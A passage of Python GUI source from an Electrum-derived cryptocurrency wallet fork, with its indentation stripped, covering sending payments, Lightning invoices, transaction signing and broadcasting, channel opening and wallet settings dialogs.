run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum LitecoinFinance. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum Bitwrb. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum LitecoinFinance seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
